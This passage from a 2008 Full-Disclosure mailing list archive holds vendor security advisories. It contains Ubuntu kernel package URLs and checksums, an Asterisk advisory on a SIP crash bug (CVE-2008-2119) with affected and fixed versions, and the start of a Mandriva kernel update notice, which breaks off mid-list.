c58709d02e7ccbbdb993cda15807da88 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-powerpc-smp_2.6.24-18.32_powerpc.deb Size/MD5: 639948 cc05989f2f445e8a2b487f323e7d2eae http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-powerpc64-smp_2.6.24-18.32_powerpc.deb Size/MD5: 644658 78c9c54b12e287c3bd511ca79650370a http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-powerpc_2.6.24-18.32_powerpc.deb Size/MD5: 639972 e53c1489f42d1cd553b37496d94e5331 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-powerpc-smp_2.6.24-18.32_powerpc.deb Size/MD5: 20103682 f78a10ec5a976e74ac9ade1f51b887c7 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-powerpc64-smp_2.6.24-18.32_powerpc.deb Size/MD5: 21340904 276a2f07e0206b603a5ea996efcfd989 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-powerpc_2.6.24-18.32_powerpc.deb Size/MD5: 19878456 52c7b9dca08c9624b8afbecc42d2f3cd http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_powerpc.deb Size/MD5: 684274 21d29fda104cb1cf171743c3fc097b5a http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 266854 4b76e92fb770e843d03772573d06a08a http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 307840 2ea36bdaf9be77b24f780d1d1df38257 http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 192204 ca487572d07e83f2efe20efc6518370f http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 201596 aff68f593a4eb35016a87e952b1764f0 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 271982 bc99b2e1ebdd5dc905cf99bf5fb62b30 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 305936 ae081cd60f3dede406ae9e95a92038b6 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 1804950 c43e1f754f69a60b064faded6d790896 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 2115324 94b7a7d63ac998129794a1fe06fbcdde http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 235156 094c62d329a068b8013deeed6d1fc372 http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 225182 81a32effd0eeddb7776db7c779ccb712 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 170092 cc07a8e3576e5d7ac62a91d62dc7e210 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 199628 313db7689756785e101473cc3d17dace http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 117922 edaf4b8f06bc63fdbc1aacc93eaed8ee http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 139182 df9e58169977cd073b56f90030e889d2 http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 45366 f4439e4d331f48fb87d2efab4400129e http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 46834 5a64a3f106c0c469f8647bb0101e4893 http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 51126 42c7633270b62d72db72ac580eb479be http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 60268 3db57248d39bee257a035dbecd623693 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 74160 6f36649b1ba72e0db47472576970bed8 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 87226 5f7a47ef7f59d7926e5d0ce8ab3aed46 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 76002 f0578b0378bcffa86a9ecfb75dd05da6 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 30228 cf8736c1c9bbb5f0079de9b3dce329b6 http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 8486 34c727d88dd251721cdf9d2686ac6386 http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 9966 70f93eeea321a341075498de109caa49 http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 57354 68be856177a23146e6bdd1c785c86abf http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 68692 8a6c28484346c9263ba39140a9843133 http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 101206 df4b3e05e906531b50467bc88cf9fdd4 http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 147644 ca04f30372bb49c8b6172a8ee3f58177 http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 1565184 9a22ef959492ac3b75618caddb7728ed http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 1514194 b9e8ae4c1c5f517afe915dee5df4f2c7 http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 76538 e8f8bbc68cb662486ba2a621da29fd05 http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 85908 b2bb43b24475dc0755e973baf0901403 http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 12710 24fb9fa782b790cc046d268a3929e52d http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 14562 3fa3d6555cbfb7d6e7f119c38505d743 http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 449176 34b00250cca7152265e60e65c5377281 http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 503618 f62ca071b326fc30dd06fd1ebb333602 http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 82342 65aad05f9cb36546d1d2d99a420e7081 http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 107528 7a8723552ef5dac04c53adaadd20f11f http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-powerpc-smp_2.6.24.13-18.41_powerpc.deb Size/MD5: 1368344 aa7c8208bfabee9b2288f5bfebbe62a6 http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-powerpc64-smp_2.6.24.13-18.41_powerpc.deb Size/MD5: 1061622 9d644eceb98a9d819483796df5d8c542 http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-powerpc_2.6.24.13-18.41_powerpc.deb Size/MD5: 1366152 fb2538d7002e5ffb27fc0ce1d1cf9618 http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-powerpc-di_2.6.24.13-18.41_powerpc.udeb Size/MD5: 762 25eb05810855f625cde190e8f6191135 http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-powerpc-di_2.6.24.13-18.41_powerpc.udeb Size/MD5: 732 3e627d0621711db60569c19e706b3a3a sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-sparc64-smp_2.6.24-18.16_sparc.deb Size/MD5: 465328 0011c146a5c44becdde1b4e9457aa6e7 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-sparc64_2.6.24-18.16_sparc.deb Size/MD5: 461744 974b8a87afbe4648bb70f837876ea63f http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-sparc64-smp_2.6.24-18.16_sparc.deb Size/MD5: 2882 b8ff448eafa10cb12aa583f697cab1ca http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-sparc64_2.6.24-18.16_sparc.deb Size/MD5: 2876 9720eb108625a653462b551c6b7fc8c9 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-sparc64-di_2.6.24-18.16_sparc.udeb Size/MD5: 644 cba7794d794ad15c3377bed47726c00f http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-sparc64-smp_2.6.24-18.26_sparc.deb Size/MD5: 184400 d755c4b80be6253765cf803b3e84e346 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-sparc64_2.6.24-18.26_sparc.deb Size/MD5: 184368 17ce5be42652d5bbe221dc5619b96bd9 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-sparc64-smp_2.6.24-18.26_sparc.deb Size/MD5: 2466288 7ebf28e9773ad1c273cc6b44006f4838 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-sparc64_2.6.24-18.26_sparc.deb Size/MD5: 2457790 0583e854681d15a2c2ca015c983c7e5d http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-sparc64-di_2.6.24-18.26_sparc.udeb Size/MD5: 1048424 f3befc449a622a3645c2062579228214 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-sparc64-di_2.6.24-18.26_sparc.udeb Size/MD5: 322534 e9edd39ef45578b6d850ac109e7be87a http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-sparc64-di_2.6.24-18.26_sparc.udeb Size/MD5: 363018 37becbd34cedf8c69737e54e4d7cbb64 http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 59600 315515c9aa3f5dc5d6f92dd4342042f5 http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 71728 5247ad96bcfee99148530568e005034d http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 42460 b766a277e27d600378a7f665e8054ed8 http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 91738 92ba6ef9a34230fa422d28c241c0e05a http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 586790 411849e5af43e174d1bd59f0f2fdec33 http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 170872 d733c54b03081266f1a04343e9ee123a http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 22356 ccc03c03b78a371dd464fa79f313963f http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 45672 dadc2137a387e7ee7e59f887442cd436 http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 152750 fb2f3cd7383296451f55597871d9e8cc http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 2120090 a51ed3c767989c1ec2e5fb533b753967 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-sparc64-smp_2.6.24-18.32_sparc.deb Size/MD5: 552136 ea22a0ad2092c04b78bf41159de409b7 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-sparc64_2.6.24-18.32_sparc.deb Size/MD5: 550558 2fe0b8a21466fd2d0b1b11b213f12420 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-sparc64-smp_2.6.24-18.32_sparc.deb Size/MD5: 14026810 f6ecac39fbdc509182f5f6a770935ff0 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-sparc64_2.6.24-18.32_sparc.deb Size/MD5: 13748224 0b8050e000fefb21e5dcdf8b18e1c1bb http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_sparc.deb Size/MD5: 739156 b9a14b8717c37cf30680c291b6c25bc4 http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 270178 2749308a62e1bb6ca3d59b9825e8a622 http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 190240 322ceae95af588c0693ce3a0f8799700 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 262758 629638db5a618ed13423e8be36794997 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 1385660 5fd88f93f0135b3b5c98a39a8ace6608 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 175180 31555911e6b6f4656049e025a2d477ea http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 122102 1217e1449367f7fd1e48b89d71cb59ee http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 40416 fcdec579bcb31e888d23f02196fdd1ff http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 48046 5df6ae2d124baa113dffb972ff10c692 http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 8666 0291b53aecf49906288f2e3cf2cf0333 http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 60342 9329da3e8a80f98ac5d94e21fb5a4663 http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 106680 4c6f8bf8f18ce974e9190cba064b084e http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 1001720 ccbb101701c46813139489b3497df9ca http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 9518 6af0ee25123dc8aebb102fdcb9b87095 http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 391062 63f84280e710ae623992c79dc7986ecd http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb Size/MD5: 58016 ffa490697c13c15037cda71992876aad http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-sparc64-smp_2.6.24.13-18.41_sparc.deb Size/MD5: 1061560 418dacb0e1b51bb05799e1b801c58ca9 http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-sparc64_2.6.24.13-18.41_sparc.deb Size/MD5: 1061482 202671b4d4125ab5d7d2acd0551a773f -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080603/c81c6da9/attachment.bin From security at asterisk.org Tue Jun 3 20:53:25 2008 From: security at asterisk.org (Asterisk Security Team) Date: Tue, 03 Jun 2008 14:53:25 -0500 Subject: [Full-disclosure] AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode Message-ID: Asterisk Project Security Advisory - AST-2008-008 +------------------------------------------------------------------------+ | Product | Asterisk | |--------------------+---------------------------------------------------| | Summary | Remote Crash Vulnerability in SIP channel driver | | | when run in pedantic mode | |--------------------+---------------------------------------------------| | Nature of Advisory | Denial of Service | |--------------------+---------------------------------------------------| | Susceptibility | Remote Unauthenticated Sessions | |--------------------+---------------------------------------------------| | Severity | Critical | |--------------------+---------------------------------------------------| | Exploits Known | No | |--------------------+---------------------------------------------------| | Reported On | May 8, 2008 | |--------------------+---------------------------------------------------| | Reported By | Hooi Ng (bugs.digium.com user hooi) | |--------------------+---------------------------------------------------| | Posted On | May 8, 2008 | |--------------------+---------------------------------------------------| | Last Updated On | June 3, 2008 | |--------------------+---------------------------------------------------| | Advisory Contact | Joshua Colp | |--------------------+---------------------------------------------------| | CVE Name | CVE-2008-2119 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Description | During pedantic SIP processing the From header value is | | | passed to the ast_uri_decode function to be decoded. In | | | two instances it is possible for the code to cause a | | | crash as the From header value is not checked to be | | | non-NULL before being passed to the function. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | The From header value is now copied into a buffer before | | | being passed to the ast_uri_decode function if pedantic | | | is enabled and in another instance it is checked to be | | | non-NULL before being passed. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release | | | | Series | | |-------------------------------+------------+---------------------------| | Asterisk Open Source | 1.0.x | All versions | |-------------------------------+------------+---------------------------| | Asterisk Open Source | 1.2.x | All versions prior to | | | | 1.2.29 | |-------------------------------+------------+---------------------------| | Asterisk Open Source | 1.4.x | Not Affected | |-------------------------------+------------+---------------------------| | Asterisk Business Edition | A.x.x | All versions | |-------------------------------+------------+---------------------------| | Asterisk Business Edition | B.x.x | All versions prior to | | | | B.2.5.3 | |-------------------------------+------------+---------------------------| | Asterisk Business Edition | C.x.x | Not Affected | |-------------------------------+------------+---------------------------| | AsteriskNOW | 1.0.x | Not Affected | |-------------------------------+------------+---------------------------| | Asterisk Appliance Developer | 0.x.x | Not Affected | | Kit | | | |-------------------------------+------------+---------------------------| | s800i (Asterisk Appliance) | 1.0.x | Not Affected | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |---------------+--------------------------------------------------------| | Asterisk Open | 1.2.29, available from | | Source | http://downloads.digium.com/pub/telephony/asterisk | |---------------+--------------------------------------------------------| | Asterisk | B.2.5.3 | | Business | | | Edition | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | http://bugs.digium.com/view.php?id=12607 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://downloads.digium.com/pub/security/AST-2008-008.pdf and | | http://downloads.digium.com/pub/security/AST-2008-008.html | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Revision History | |------------------------------------------------------------------------| | Date | Editor | Revisions Made | |------------------+--------------------+--------------------------------| | 2008-06-03 | Joshua Colp | Initial Release | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - AST-2008-008 Copyright (c) 2008 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. From security at mandriva.com Tue Jun 3 21:43:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 03 Jun 2008 14:43:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:109 ] - Updated kernel packages fix bugs Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:109 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kernel Date : June 3, 2008 Affected: 2008.1 _______________________________________________________________________ Problem Description: A vulnerability was discovered and corrected in the Linux 2.6 kernel: The bdx_ioctl_priv function in the tehuti driver (tehuti.c) in Linux kernel 2.6.x before 2.6.25.1 does not properly check certain information related to register size, which has unspecified impact and local attack vectors, probably related to reading or writing kernel memory. (CVE-2008-1675) Additionaly, some fixes were made, related to: iwlwifi (small bug interacting with drakconnect interface detection), brightness handling on EeePc, uvcvideo on Thinkpad X300, sound for TOSHIBA Satellite Pro A200 and A210, RealTek 8169 ethernet, unionfs, and more. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1675 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: a0977ad73f98ee3ebac64fd5facd815e 2008.1/i586/actuator-kernel-2.6.24.5-desktop-1mnb-1.0.5-4mdv2008.1.i586.rpm 53ac4aebd5ca00cd90f583696ca45703 2008.1/i586/actuator-kernel-2.6.24.5-desktop586-1mnb-1.0.5-4mdv2008.1.i586.rpm c6a78e6e98a3fbfc6df31d461a39e991 2008.1/i586/actuator-kernel-2.6.24.5-laptop-1mnb-1.0.5-4mdv2008.1.i586.rpm 57bdb69f6d81874c7830087154eb7dfb 2008.1/i586/actuator-kernel-2.6.24.5-server-1mnb-1.0.5-4mdv2008.1.i586.rpm 7356d19d6279aaac6284c8f3f6239e03 2008.1/i586/actuator-kernel-desktop586-latest-1.0.5-1.20080528.4mdv2008.1.i586.rpm 76b2fb2cfd066f51451a4654ee5bbf04 2008.1/i586/actuator-kernel-desktop-latest-1.0.5-1.20080528.4mdv2008.1.i586.rpm 0e88b1dca7e5c96d14e78b544d4b12e9 2008.1/i586/actuator-kernel-laptop-latest-1.0.5-1.20080528.4mdv2008.1.i586.rpm 853f1be9ebc3a1bd58b723aca4788474 2008.1/i586/actuator-kernel-server-latest-1.0.5-1.20080528.4mdv2008.1.i586.rpm c2da0daed6eb502cbf0862079d09d56f 2008.1/i586/alsa_raoppcm-kernel-2.6.24.5-desktop-1mnb-0.5.1-2mdv2008.0.i586.rpm af1a377a9a672cf57858b623e8f3ab93 2008.1/i586/alsa_raoppcm-kernel-2.6.24.5-desktop586-1mnb-0.5.1-2mdv2008.0.i586.rpm 54127dcca344a72a8f71de3e2efa17cc 2008.1/i586/alsa_raoppcm-kernel-2.6.24.5-laptop-1mnb-0.5.1-2mdv2008.0.i586.rpm 44c06dd34654963ce70b9d94d2da94be 2008.1/i586/alsa_raoppcm-kernel-2.6.24.5-server-1mnb-0.5.1-2mdv2008.0.i586.rpm f6d4b273231117bcddf412878a1df3c9 2008.1/i586/alsa_raoppcm-kernel-desktop586-latest-0.5.1-1.20080528.2mdv2008.0.i586.rpm 8d73b305ee189e6570efe9462de69515 2008.1/i586/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20080528.2mdv2008.0.i586.rpm cd2df23e83def50b7c69e0ceacae48dc 2008.1/i586/alsa_raoppcm-kernel-laptop-latest-0.5.1-1.20080528.2mdv2008.0.i586.rpm d6bb34ca0eda1cf11f517fc125e575a6 2008.1/i586/alsa_raoppcm-kernel-server-latest-0.5.1-1.20080528.2mdv2008.0.i586.rpm 69deaf0f879245b9d05fc4572dae3e3e 2008.1/i586/drm-experimental-kernel-2.6.24.5-desktop-1mnb-2.3.0-1.20080223.1mdv2008.1.i586.rpm 7a62fed72bf86b27c81cf2516e17492c 2008.1/i586/drm-experimental-kernel-2.6.24.5-desktop586-1mnb-2.3.0-1.20080223.1mdv2008.1.i586.rpm 653e1f5e44dab8779b56c3d9248884f6 2008.1/i586/drm-experimental-kernel-2.6.24.5-laptop-1mnb-2.3.0-1.20080223.1mdv2008.1.i586.rpm 0c214654767a07fa64ef50e8251e0746 2008.1/i586/drm-experimental-kernel-2.6.24.5-server-1mnb-2.3.0-1.20080223.1mdv2008.1.i586.rpm 806a91d7f7fa0704f65e7ec5d1706bc4 2008.1/i586/drm-experimental-kernel-desktop586-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.i586.rpm 39678f480365eb9498933c7e786031eb 2008.1/i586/drm-experimental-kernel-desktop-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.i586.rpm 1c415542f3c03480bae5076351497f0b 2008.1/i586/drm-experimental-kernel-laptop-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.i586.rpm 469e415face007851269386baf340e7e 2008.1/i586/drm-experimental-kernel-server-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.i586.rpm 01c38e42860b5c43e0582c58cc2950c1 2008.1/i586/em8300-kernel-2.6.24.5-desktop-1mnb-0.16.4-1mdv2008.1.i586.rpm 7b37e622c57f0c5dcff3b0cb286edb2e 2008.1/i586/em8300-kernel-2.6.24.5-desktop586-1mnb-0.16.4-1mdv2008.1.i586.rpm ac9d0d8bd5c66efab9b1ab67b0217865 2008.1/i586/em8300-kernel-2.6.24.5-laptop-1mnb-0.16.4-1mdv2008.1.i586.rpm e4d2ed7ff4bb7e2661057bf2c55e6ab5 2008.1/i586/em8300-kernel-2.6.24.5-server-1mnb-0.16.4-1mdv2008.1.i586.rpm 6764681ea210d734416d23ec3b289b5c 2008.1/i586/em8300-kernel-desktop586-latest-0.16.4-1.20080528.1mdv2008.1.i586.rpm 2f0564fcd97b1bcedf83aadbf9298703 2008.1/i586/em8300-kernel-desktop-latest-0.16.4-1.20080528.1mdv2008.1.i586.rpm a6366a8f3c1e2ff4c3d8150cb1f38280 2008.1/i586/em8300-kernel-laptop-latest-0.16.4-1.20080528.1mdv2008.1.i586.rpm 2972292d517a00f0ec21bcc5cb40c8ae 2008.1/i586/em8300-kernel-server-latest-0.16.4-1.20080528.1mdv2008.1.i586.rpm cf25e774b9cdc1dbb96ac50d794ef02b 2008.1/i586/fcdsl2-kernel-2.6.24.5-desktop-1mnb-3.11.07-7mdv2008.1.i586.rpm 51696b090c0316dcfb8bf32dcc775f8f 2008.1/i586/fcdsl2-kernel-2.6.24.5-desktop586-1mnb-3.11.07-7mdv2008.1.i586.rpm e4af6d5bb14a42b73d32c3111cbafa8a 2008.1/i586/fcdsl2-kernel-2.6.24.5-laptop-1mnb-3.11.07-7mdv2008.1.i586.rpm 2b5372be316d14dd533547af0c44e69a 2008.1/i586/fcdsl2-kernel-2.6.24.5-server-1mnb-3.11.07-7mdv2008.1.i586.rpm 25ef11d6e73d4e19cf83e83f6017168d 2008.1/i586/fcdsl2-kernel-desktop586-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 8b6ab667139a076987de72722a4ae03c 2008.1/i586/fcdsl2-kernel-desktop-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 00fa8b0b4f24e20685d9adf6158c4079 2008.1/i586/fcdsl2-kernel-laptop-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 87b6e02a90ec9badf39de26a63a0abbb 